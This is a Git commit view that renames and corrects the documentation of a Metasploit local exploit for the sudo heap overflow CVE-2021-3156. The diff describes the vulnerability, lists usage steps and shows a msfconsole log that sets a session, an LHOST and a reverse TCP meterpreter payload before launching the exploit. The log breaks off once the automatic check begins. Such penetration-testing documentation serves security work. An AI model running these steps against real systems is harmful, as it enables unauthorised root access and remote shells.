adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Implement feedback from PR review

Browse Source
This commit is contained in:
Spencer McIntyre
2021-02-04 09:25:40 -05:00
parent c33c08bae9
commit 7281d00938
3 changed files with 32 additions and 54 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/cve_2021_3156_sudo.md → documentation/modules/exploit/linux/local/sudo_baron_samedit.md
+8 -8
View File
@@ -1,14 +1,14 @@
## Vulnerable Application
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was interested in July of 2011 and affects version 1.8.2
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a `service_user` struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.
### Manual Target
The exploit requires a number of lengths / offsets to function correction. The manual target can be used to specify
The exploit requires a number of lengths / offsets to function correctly. The manual target can be used to specify
these values if they are known. To identify the values, use the `brute.sh` script from the original PoC repository at
[blasty/CVE-2021-3156][1].
@@ -41,7 +41,7 @@ Example steps in this format (is also in the PR):
1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/local/cve_2021_3156_sudo`
1. Do: `use exploit/linux/local/sudo_baron_samedit`
1. Set the necessary options (target, payload, etc.)
1. Do: `run`
@@ -82,15 +82,15 @@ BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2021_3156_sudo
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3156_sudo) > set SESSION 1
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > set LHOST 192.168.159.128
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/cve_2021_3156_sudo) > set TARGET 1
msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET 1
TARGET => 1
msf6 exploit(linux/local/cve_2021_3156_sudo) > exploit
msf6 exploit(linux/local/sudo_baron_samedit) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)